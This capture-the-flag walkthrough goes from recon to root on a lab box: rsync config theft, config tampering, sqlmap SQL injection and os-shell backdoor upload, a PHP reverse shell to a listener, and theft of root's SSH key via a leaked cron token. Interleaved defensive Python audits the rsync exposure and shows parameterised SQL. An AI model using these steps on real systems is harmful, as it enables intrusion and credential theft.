Recon to foothold

Let’s make a variable so we can refer to the box by name throughout

root@incognito:~# export TARGET=$TARGET
root@incognito:~# echo $TARGET
$TARGET

So, as always, let’s begin with a scan: first masscan, to pick up as many open ports as possible (TCP and UDP)

rob:Metamorphosis/ $ sudo masscan -p1-65535,U:1-65535 $TARGET --rate=1000 -e tun0
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-07-20 20:07:37 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 139/tcp on $TARGET                                  
Discovered open port 137/udp on $TARGET                                  
Discovered open port 873/tcp on $TARGET                                  
Discovered open port 22/tcp on $TARGET                                   
Discovered open port 80/tcp on $TARGET                                   
Discovered open port 445/tcp on $TARGET 

Then nmap to identify the services on those ports. We can leave out UDP:137, as it is just the UDP complement to TCP:139

rob:Metamorphosis/ $ nmap -A -v -T4 -p22,80,139,445,873 $TARGET                                                                    
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 21:13 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating Ping Scan at 21:13
Scanning $TARGET [2 ports]
Completed Ping Scan at 21:13, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:13
Completed Parallel DNS resolution of 1 host. at 21:13, 0.03s elapsed
Initiating Connect Scan at 21:13
Scanning $TARGET [5 ports]
Discovered open port 445/tcp on $TARGET
Discovered open port 22/tcp on $TARGET
Discovered open port 139/tcp on $TARGET
Discovered open port 80/tcp on $TARGET
Discovered open port 873/tcp on $TARGET
Completed Connect Scan at 21:13, 0.01s elapsed (5 total ports)
Initiating Service scan at 21:13
Scanning 5 services on $TARGET
Completed Service scan at 21:13, 11.42s elapsed (5 services on 1 host)
NSE: Script scanning $TARGET.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.74s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.05s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Nmap scan report for $TARGET
Host is up (0.011s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f7:0f:0a:18:50:78:07:10:f2:32:d1:60:30:40:d4:be (RSA)
|   256 5c:00:37:df:b2:ba:4c:f2:3c:46:6e:a3:e9:44:90:37 (ECDSA)
|_  256 fe:bf:53:f1:d0:5a:7c:30:db:ac:c8:3c:79:64:47:c8 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open  rsync       (protocol version 31)
Service Info: Host: INCOGNITO; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| nbstat: NetBIOS name: INCOGNITO, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   INCOGNITO<00>        Flags: <unique><active>
|   INCOGNITO<03>        Flags: <unique><active>
|   INCOGNITO<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: incognito
|   NetBIOS computer name: INCOGNITO\x00
|   Domain name: \x00
|   FQDN: incognito
|_  System time: 2021-07-20T20:13:50+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-20T20:13:50
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.97 seconds

Before enumerating the web site on port 80, let’s quickly check out the other services, starting with SMB, in case there are useful creds or clues to be found

rob:Metamorphosis/ $ smbclient -L $TARGET -U "" -N

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (incognito server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

No user shares there, but perhaps we can find something on the hidden shares

rob:Metamorphosis/ $ smbclient -U "" -N //$TARGET/print$
tree connect failed: NT_STATUS_ACCESS_DENIED
rob:Metamorphosis/ $ smbclient -U "" -N //$TARGET/IPC$  
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

No, we can’t!

On port 873 we find rsync; let’s try to enumerate it

rob:Metamorphosis/ $ nc -vn $TARGET 873

(UNKNOWN) [$TARGET] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0           
#list
Conf           	All Confs
@RSYNCD: EXIT

OK, we find a shared folder (an rsync module), Conf. Let’s now see if we can enumerate its contents

rob:Metamorphosis/ $ nc -vn $TARGET 873

(UNKNOWN) [$TARGET] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
Conf
@RSYNCD: OK
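The two nc sessions above are the rsync daemon protocol done by hand: the server greets with its version, the client echoes it, then either sends `#list` or a module name and gets back `@RSYNCD: OK`, `@RSYNCD: AUTHREQD <challenge>` or an `@ERROR`. The script below, an added example that is not part of the original writeup, performs that exchange so that you can check a daemon you administer and see which advertised modules answer `OK` without any authentication. Host and port are supplied by the caller; nothing here is the box’s own code.

```python
"""Speak the rsync daemon greeting, list modules and classify each one's
reply to a bare module request. Added example: a check for a daemon you
run, not part of the original writeup. The caller supplies host and port."""
import socket


def read_line(sock):
    """The daemon protocol is line based; read one newline-terminated line."""
    buf = bytearray()
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode("utf-8", "replace").rstrip("\r\n")


def handshake(sock):
    """Server greets with "@RSYNCD: <version> [digests]"; we echo the version."""
    greeting = read_line(sock)
    if not greeting.startswith("@RSYNCD:"):
        raise ValueError(f"not an rsync daemon greeting: {greeting!r}")
    version = greeting.split()[1]
    sock.sendall(f"@RSYNCD: {version}\n".encode())
    return version


def parse_module_line(line):
    """'#list' replies are '<name><tab><comment>'; return (name, comment).
    A motd, if the daemon sends one, arrives as extra lines with no tab."""
    name, _, comment = line.partition("\t")
    return name.strip(), comment.strip()


def classify_reply(line):
    """Map the daemon's answer to a module name onto an access class."""
    if line == "@RSYNCD: OK":
        return "anonymous"
    if line.startswith("@RSYNCD: AUTHREQD"):
        return "auth required"
    if line.startswith("@ERROR"):
        return "error"
    return "unknown"


def list_modules(host, port=873, timeout=5.0):
    """Return [(name, comment), ...] for every module the daemon advertises."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        handshake(sock)
        sock.sendall(b"#list\n")
        modules = []
        while True:
            line = read_line(sock)
            if line == "" or line.startswith("@RSYNCD: EXIT"):
                break
            modules.append(parse_module_line(line))
    return modules


def probe_module(host, module, port=873, timeout=5.0):
    """Ask for one module and classify the reply; the connection is then
    dropped, so nothing is transferred."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        handshake(sock)
        sock.sendall(f"{module}\n".encode())
        return classify_reply(read_line(sock))


def audit_daemon(host, port=873):
    """{module: access class} for every advertised module on the daemon."""
    return {name: probe_module(host, name, port) for name, _ in list_modules(host, port)}


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for name, access in audit_daemon(target).items():
        print(f"{name}: {access}")
```

Any module that reports `anonymous` here is readable by anyone who can reach port 873; whether it is also writable depends on the daemon’s `read only` setting, which this probe cannot see from the outside.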

It seems we can: there is no AUTHREQD response. Now let’s list the files it contains

rob:Metamorphosis/ $ rsync -av --list-only rsync://$TARGET/Conf
receiving incremental file list
drwxrwxrwx          4,096 2021/04/10 21:03:08 .
-rw-r--r--          4,620 2021/04/09 21:01:22 access.conf
-rw-r--r--          1,341 2021/04/09 20:56:12 bluezone.ini
-rw-r--r--          2,969 2021/04/09 21:02:24 debconf.conf
-rw-r--r--            332 2021/04/09 21:01:38 ldap.conf
-rw-r--r--         94,404 2021/04/09 21:21:57 lvm.conf
-rw-r--r--          9,005 2021/04/09 20:58:40 mysql.ini
-rw-r--r--         70,207 2021/04/09 20:56:56 php.ini
-rw-r--r--            320 2021/04/09 21:03:16 ports.conf
-rw-r--r--            589 2021/04/09 21:01:07 resolv.conf
-rw-r--r--             29 2021/04/09 21:02:56 screen-cleanup.conf
-rw-r--r--          9,542 2021/04/09 21:00:59 smb.conf
-rw-rw-r--             72 2021/04/10 21:03:06 webapp.ini

sent 20 bytes  received 379 bytes  798.00 bytes/sec
total size is 193,430  speedup is 484.79

Excellent, it wasn’t lying: ALL the conf files indeed. Let’s grab them all, then we can go through them for interesting tidbits

rob:Metamorphosis/ $ rsync -av rsync://$TARGET:873/Conf ./rsync_files/ 
receiving incremental file list
created directory ./rsync_files
./
access.conf
bluezone.ini
debconf.conf
ldap.conf
lvm.conf
mysql.ini
php.ini
ports.conf
resolv.conf
screen-cleanup.conf
smb.conf
webapp.ini

sent 255 bytes  received 194,360 bytes  129,743.33 bytes/sec
total size is 193,430  speedup is 0.99

Going through these we find:

  • access.conf: Login access control, all commented out
  • bluezone.ini: Config for a possibly old version of a terminal emulator, which changed name to Rocket Terminal Emulator after an acquisition in 2007; possibly useful info later
  • debconf.conf: Config file for debconf, mostly containing filesystem locations. From the manual we can read a description:

    Debconf provides a consistent interface for configuring packages, allowing you to choose from several user interface frontends. It supports preconfiguring packages before they are installed, which allows large installs and upgrades to ask you for all the necessary information up front, and then go do the work while you do something else

  • ldap.conf, lvm.conf, mysql.ini, php.ini, ports.conf, resolv.conf & screen-cleanup.conf: all contain default values and nothing of interest
  • smb.conf: Samba settings. Apart from letting us confirm guest ok = no for the print$ share, there is nothing of interest here
  • webapp.ini: Now this one (the last one, naturally) does have some useful information for us

    [Web_App]
    env = prod
    user = tom
    password = theCat

    [Details]
    Local = No


Excellent, we’ve found some creds, tom:theCat. Let’s see if these are useful later on

Alright, time to enumerate the web server on port 80

OK, we find the default Apache2 install page. A quick check shows no sneaky comments or scripts, and there is no robots.txt file. Our nmap scan did, however, show us a hostname for the server

Computer name: incognito

We can add this to our /etc/hosts file in case a virtual host on this web server is hiding something useful from us. However, incognito.thm (and a couple of other variants) doesn’t get us anywhere either

Let’s try some directory busting with gobuster

rob:rsync_files/ $ gobuster dir --url http://incognito.thm -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x txt,php,conf,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://incognito.thm
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,conf,zip,bak,txt
[+] Timeout:                 10s
===============================================================
2021/07/20 21:59:57 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 314] [--> http://incognito.thm/admin/]
/index.php            (Status: 200) [Size: 10818]                                
/server-status        (Status: 403) [Size: 278]                                  
/index.php            (Status: 200) [Size: 10818]                                
                                                                                 
===============================================================
2021/07/20 22:06:54 Finished
===============================================================

Straight away we find an /admin directory, but receive a fake ‘403 Forbidden’. The server is actually returning ‘200 OK’; the index page simply has that message as its body

Let’s run gobuster on that subdirectory, /admin, and see if there is anything more to be found

rob:rsync_files/ $ gobuster dir --url http://incognito.thm/admin/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x txt,php,conf,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://incognito.thm/admin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php,conf,zip,bak
[+] Timeout:                 10s
===============================================================
2021/07/20 22:10:44 Starting gobuster in directory enumeration mode
===============================================================
/config.php           (Status: 200) [Size: 0]
/index.php            (Status: 200) [Size: 132]
/index.php            (Status: 200) [Size: 132]
                                               
===============================================================
2021/07/20 22:17:40 Finished
===============================================================

Nothing to be found here either.

Taking a closer look at that fake 403 page we find something interesting: a comment in the HTML source

<html> <head><h1>403 Forbidden</h1></head><!-- Make sure admin functionality can only be used in development environment. --></html>

Perhaps there is a development virtual host, something like dev.* or beta.*. Let’s use gobuster again, in vhost mode, to search for one

rob:Metamorphosis/ $ gobuster vhost --url http://incognito.thm -w /usr/share/seclists/Discovery/DNS/deepmagic.com-prefixes-top50000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://incognito.thm
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/deepmagic.com-prefixes-top50000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2021/07/21 11:43:38 Starting gobuster in VHOST enumeration mode
===============================================================
Found: block7_dsl.incognito.thm (Status: 400) [Size: 422]
Found: mu_domain.incognito.thm (Status: 400) [Size: 422] 
Found: block6_dsl.incognito.thm (Status: 400) [Size: 422]
Found: wm_nmeiers1.incognito.thm (Status: 400) [Size: 422]
                                                          
===============================================================
2021/07/21 11:45:06 Finished
===============================================================

OK, nothing jumps out there (the four hits all contain an underscore and come back as 400 Bad Request, which is the server rejecting a malformed Host header rather than a real vhost), and we tried a few different wordlists to be sure

Does that rsync share let us write to it? We saw an env switch in that webapp.ini file that we might be able to overwrite

[Web_App]
env = prod     <---- **what if we change this to 'dev'**
user = tom
password = theCat

[Details]
Local = No

We edit the file to set the env parameter to dev and then use rsync to upload it

rob:Metamorphosis/ $ rsync -avH webapp.ini rsync://$TARGET:873/Conf
sending incremental file list
webapp.ini

sent 177 bytes  received 41 bytes  436.00 bytes/sec
total size is 71  speedup is 0.33
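The upload succeeding is the real finding here: the Conf module is advertised, needs no authentication, and is not read-only, so anyone who can reach port 873 can rewrite a file the web application trusts. The script below is an added example, not part of the original writeup and not the box’s real daemon config. It parses an rsyncd.conf and reports modules that anonymous clients can list, read or write, using two constructed samples: one that would produce the behaviour seen on this box and a hardened alternative (module path, user name and the 192.0.2.10 address are placeholders).

```python
"""Audit an rsyncd.conf for modules that anonymous clients can list, read or
write. Added example, not the box's real config: both samples below are
constructed, one matching the behaviour the writeup observed and one hardened."""

# rsyncd.conf(5) defaults: modules are read-only and listed unless told
# otherwise, and need no authentication unless "auth users" is set.
DEFAULTS = {"read only": "yes", "list": "yes", "auth users": "", "hosts allow": ""}
FALSE_WORDS = {"no", "false", "0"}


def parse_rsyncd_conf(text):
    """Return (globals, {module: params}). Parameters before the first
    [section] are global and apply to every module unless overridden."""
    globals_, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # rsync ignores full-line comments
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        target = globals_ if current is None else modules[current]
        target[key.strip().lower()] = value.strip()
    return globals_, modules


def audit(text):
    """List (module, finding) pairs describing anonymous exposure."""
    globals_, modules = parse_rsyncd_conf(text)
    findings = []
    for name, params in modules.items():
        eff = {**DEFAULTS, **globals_, **params}      # module overrides global overrides default
        anonymous = eff["auth users"] == ""
        writable = eff["read only"].lower() in FALSE_WORDS
        listed = eff["list"].lower() not in FALSE_WORDS
        if anonymous and writable:
            findings.append((name, "anonymous write access"))
        elif anonymous:
            findings.append((name, "anonymous read access"))
        if anonymous and listed:
            findings.append((name, "advertised to anonymous #list"))
        if eff["hosts allow"] == "":
            findings.append((name, "no hosts allow restriction"))
    return findings


# Constructed: a daemon config that would explain what the writeup saw
# (listable, unauthenticated, writable "Conf" module). Path is hypothetical.
WEAK_CONF = """\
uid = nobody
gid = nogroup
use chroot = yes

[Conf]
# hypothetical path
path = /srv/rsync/conf
comment = All Confs
read only = false
"""

# Constructed hardened version: read-only, not advertised, authenticated and
# limited to one management host (192.0.2.10 is a documentation address).
HARDENED_CONF = """\
uid = nobody
gid = nogroup
use chroot = yes

[Conf]
path = /srv/rsync/conf
comment = All Confs
read only = yes
list = no
auth users = confsync
secrets file = /etc/rsyncd.secrets
hosts allow = 192.0.2.10
"""


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf) or "no anonymous exposure")
```

Run against a real file with `audit(open("/etc/rsyncd.conf").read())`. The `read only = false` line is the single setting that turned a config leak into a config overwrite; the hardened sample removes it and adds the three layers (no listing, a secrets file, a host allow list) that each independently would have stopped what the writeup did.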

Alright, that seemed to work. Now, do we get a different result when we request /admin?

Excellent, yes it does! If we put the username tom into the query we get a response that confirms the password we saw earlier

It seems highly likely that this is backed by an SQL query, and indeed we saw a mysql config file earlier. Let’s have a look for an SQL injection vulnerability using sqlmap

rob:Metamorphosis/ $ sqlmap -u http://$TARGET/admin/config.php --data "username=FUZZ" --level 5 --dbs
--snip--
available databases [5]:
[*] db
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

Excellent, we have found a vulnerability and can see the databases. Let’s have a look in db for what tables might be there

rob:Metamorphosis/ $ sqlmap -u http://$TARGET/admin/config.php --data "username=FUZZ" --level 5 -D db --tables
--snip--
Database: db
[1 table]
+-------+
| users |
+-------+

OK, just the one table, users. Let’s dump it out

[1 entry]
+----+-------+----------+
| id | uname | password |
+----+-------+----------+
| 1  | tom   | thecat   |
+----+-------+----------+

OK, nothing in there apart from the user we already know!
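The payloads sqlmap settles on further down (`username=-7014" OR 8671=8671-- ` and a three-column `UNION ALL SELECT NULL,...,NULL`) tell us the shape of the bug: the POST value is dropped straight into a quoted string literal in the query. The block below is an added example, not the box’s PHP, showing that lookup in its vulnerable and its parameterised form side by side. sqlite3 stands in for the MySQL backend, the users table is constructed from the dump above, and single quotes are used where the page’s MySQL payloads close a double-quoted literal.

```python
"""Vulnerable versus parameterised user lookup for the injection sqlmap found.
Added example, not the box's code: sqlite3 stands in for MySQL and the users
table is constructed from the dump shown in the writeup."""
import sqlite3


def make_db():
    """In-memory users table with the one row the dump shows (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, uname TEXT, password TEXT)")
    conn.execute("INSERT INTO users (id, uname, password) VALUES (1, 'tom', 'thecat')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """Interpolates the raw POST value into the string literal, so a quote in
    the input ends the literal and everything after it is parsed as SQL."""
    query = f"SELECT id, uname, password FROM users WHERE uname = '{username}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, username):
    """Bound parameter: the value travels separately from the SQL text, so
    quotes, OR and -- remain part of the compared string."""
    query = "SELECT id, uname, password FROM users WHERE uname = ?"
    return conn.execute(query, (username,)).fetchall()


# The shapes of sqlmap's boolean-based and UNION payloads from the writeup,
# with the quote character matching this example's literal.
BOOLEAN_PAYLOAD = "-7014' OR 8671=8671-- x"
UNION_PAYLOAD = "' UNION ALL SELECT NULL, sqlite_version(), NULL-- x"


def demo():
    """Same inputs through both lookups; only the vulnerable one is fooled."""
    conn = make_db()
    return {
        "vulnerable/tom": lookup_vulnerable(conn, "tom"),
        "vulnerable/boolean": lookup_vulnerable(conn, BOOLEAN_PAYLOAD),
        "vulnerable/union": lookup_vulnerable(conn, UNION_PAYLOAD),
        "safe/tom": lookup_safe(conn, "tom"),
        "safe/boolean": lookup_safe(conn, BOOLEAN_PAYLOAD),
        "safe/union": lookup_safe(conn, UNION_PAYLOAD),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case}: {rows}")
```

The boolean payload makes the vulnerable `WHERE` clause true for every row, which is what sqlmap’s blind technique measures, and the UNION payload appends attacker-chosen columns (here the database version) to the result set, which is how it later read the users table. The parameterised version returns nothing for either input because the whole string is compared as a username.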

Let’s try using sqlmap again to see if we can get a shell

rob:Metamorphosis/ $ sqlmap -u http://$TARGET/admin/config.php --data "username=FUZZ" --level 5 -D db --os-shell
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.7#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:09:43 /2021-07-21/

[13:09:43] [INFO] resuming back-end DBMS 'mysql' 
[13:09:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-7014" OR 8671=8671-- HOQx

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=FUZZ" AND (SELECT 9890 FROM (SELECT(SLEEP(5)))LxiX)-- ayAg

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=FUZZ" UNION ALL SELECT NULL,CONCAT(0x7176627671,0x5556544a497752754a637a636558576b466b6d4c4972664c77576a7558435965516f744256705962,0x7178706b71),NULL-- -
---
[13:09:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[13:09:43] [INFO] going to use a web backdoor for command prompt
[13:09:43] [INFO] fingerprinting the back-end DBMS operating system
[13:09:43] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] 
[13:09:45] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 
[13:09:46] [WARNING] unable to automatically parse any web server path
[13:09:46] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[13:09:46] [WARNING] unable to upload the file stager on '/var/www/'
[13:09:46] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[13:09:47] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:09:47] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[13:09:47] [INFO] trying to upload the file stager on '/var/www/admin/' via LIMIT 'LINES TERMINATED BY' method
[13:09:47] [WARNING] unable to upload the file stager on '/var/www/admin/'
[13:09:47] [INFO] trying to upload the file stager on '/var/www/admin/' via UNION method
[13:09:47] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[13:09:47] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[13:09:47] [WARNING] unable to upload the file stager on '/var/www/html/'
[13:09:47] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method
[13:09:47] [INFO] the remote file '/var/www/html/tmpultjc.php' is larger (707 B) than the local file '/tmp/sqlmapnkafb_pk26679/tmphmqslgp0' (705B)
[13:09:47] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://$TARGET:80/tmpultjc.php
[13:09:47] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://$TARGET:80/tmpbgxxa.php
[13:09:47] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] 
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'

OK, that worked nicely. We can also see the web address of the file stager (important: the stager, not the backdoor URL). Let’s have a look at that

Well, that looks useful. Can we upload our go-to PHP reverse shell from pentestmonkey?

Looks like it. Let’s request the link now and see if we pop a shell

rob:rsync_files/ $ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.14.6.26] from (UNKNOWN) [$TARGET] 34302
Linux incognito 4.15.0-144-generic #148-Ubuntu SMP Sat May 8 02:33:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 12:45:09 up  1:25,  0 users,  load average: 0.02, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Yes we do, we have our foothold!

Privesc to root

Let’s quickly stabilise our shell

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@incognito:/$ ^Z
[1]  + 27516 suspended  nc -lnvp 1234
rob:rsync_files/ $ stty -a
speed 38400 baud; rows 49; columns 125; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S;
susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
rob:rsync_files/ $ stty raw -echo; fg
[1]  + 27516 continued  nc -lnvp 1234

www-data@incognito:/$ stty rows 49 columns 125
www-data@incognito:/$ export SHELL=bash
www-data@incognito:/$ export TERM=xterm-256color
www-data@incognito:/$ ^C
www-data@incognito:/$

Now we won’t be thrown out of our shell if we hit ^C, and we have history, command completion etc. all working. NB: because our attack box shell is zsh, we have to run stty raw -echo; fg on a single line rather than as two separate commands, as is often shown in guides

A quick check shows that the user flag is world-readable, so let’s grab that first

www-data@incognito:/$ ls -la /home/tom/user.txt 
-rw-rw-r-- 1 tom tom 33 Apr 10 19:48 /home/tom/user.txt
www-data@incognito:/$ cat /home/tom/
.bash_history  .bash_logout   .bashrc        .cache/        .gnupg/        .local/        .profile       user.txt
www-data@incognito:/$ cat /home/tom/user.txt 
`REDACTED`

And we got #1: 4ce794a9d0019c1f684e07556821e0b0

Doing some enumeration on the box, we run pspy64 to look for cron tasks and find something interesting: a recurring curl command to an internally bound port. We saw this port earlier but discounted it as an IPv6-related service. NB: don’t trust online ‘well-known ports’ lists; it is always worth checking oneself

--snip--
2021/07/21 13:54:01 CMD: UID=0    PID=27272  | curl http://127.0.0.1:1027/?admin=ScadfwerDSAd_343123ds123dqwe12 
2021/07/21 13:54:01 CMD: UID=0    PID=27271  | /bin/sh /root/req.sh 
2021/07/21 13:54:01 CMD: UID=0    PID=27270  | /bin/sh -c /root/req.sh 
--snip--

Let’s try reproducing this curl command and see if we get a response

www-data@incognito:/tmp$  curl http://127.0.0.1:1027/?admin=ScadfwerDSAd_343123ds123dqwe12
-----BEGIN RSA PRIVATE KEY-----
--snip--
-----END RSA PRIVATE KEY-----

Well, well, it seems we’ve found root’s private key. We should be able to SSH in as root now

rob:Metamorphosis/ $ vi id_rsa_root                       
rob:Metamorphosis/ $ chmod 600 id_rsa_root 
rob:Metamorphosis/ $ ssh -i id_rsa_root root@$TARGET
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-144-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jul 21 14:01:33 UTC 2021

  System load:  0.0               Processes:           114
  Usage of /:   53.3% of 8.79GB   Users logged in:     0
  Memory usage: 66%               IP address for eth0: $TARGET
  Swap usage:   0%


0 updates can be applied immediately.


Last login: Sat Apr 10 19:40:46 2021
root@incognito:~# 

And we have root!

Let’s quickly grab the root flag then

root@incognito:~# cat root.txt 
`REDACTED`

And we have #2: 7ffca2ec63534d165525bf37d91b4ff4